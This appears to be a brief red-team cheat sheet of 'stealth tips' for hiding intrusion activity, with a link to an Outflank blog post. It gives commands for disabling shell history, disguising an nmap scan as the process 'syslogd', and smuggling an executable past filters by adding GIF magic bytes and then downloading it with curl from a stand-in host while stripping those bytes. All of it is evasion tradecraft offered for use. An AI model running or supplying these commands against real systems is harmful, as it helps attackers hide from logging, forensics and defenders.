Resources
- https://outflank.nl/blog/2021/04/02/our-reasoning-for-outflank-security-tooling/
Stealth Tips
Disable history (do first) - “export HISTFILE=/dev/null”
Hide a command by masking it as syslogd - “(exec -a syslogd nmap -T0 10.0.2.1/24)”
Start a background hidden process as syslogd - “exec -a syslogd nmap -T0 10.0.2.1/24 &>nmap.log &”
Download File
1.) Rename/insert magic bytes: “sed ‘1s/^/GIF87a/’ calc.exe > calc.gif”
2.) Download, stripping magic bytes: “curl.exe -qk -X GET -C 6 https://example.com/calc.gif > calc.exe”
